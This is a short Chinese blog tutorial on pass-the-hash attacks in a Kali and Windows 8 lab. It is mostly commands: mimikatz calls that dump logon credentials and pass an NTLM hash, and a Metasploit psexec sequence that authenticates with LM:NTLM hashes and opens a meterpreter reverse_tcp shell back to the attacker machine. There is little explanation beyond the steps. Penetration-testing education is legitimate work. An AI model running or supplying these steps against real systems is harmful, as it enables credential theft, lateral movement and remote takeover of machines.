哈希传递(PTH)攻击利用

哈希传递(PTH)攻击利用

环境:kali &win8

privilege::debug
sekurlsa::logonpasswords

win8中运行:
网上github先下载mimikatz_trunk,下载解压后在x64中打开小猕猴桃
在这里插入图片描述

sekurlsa::pth /user:administrator /domain:本机IP /ntlm:7365e3b22baeaebc0411873eedf84390

在这里插入图片描述
在这里插入图片描述
kali中按下方操作

msf > use  exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost kaliip
msf exploit(psexec) > set rhost win10ip
msf exploit(psexec) > set smbuser Administrator
msf exploit(psexec) > set smbpass 6d181cfaad0258eaaad3b435b51404ee: 9d482ae1705fd48c581e20a4123fb0dc   # 冒号前面为LM后面为NTLM
msf exploit(psexec) > exploit

运行结果如下:在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值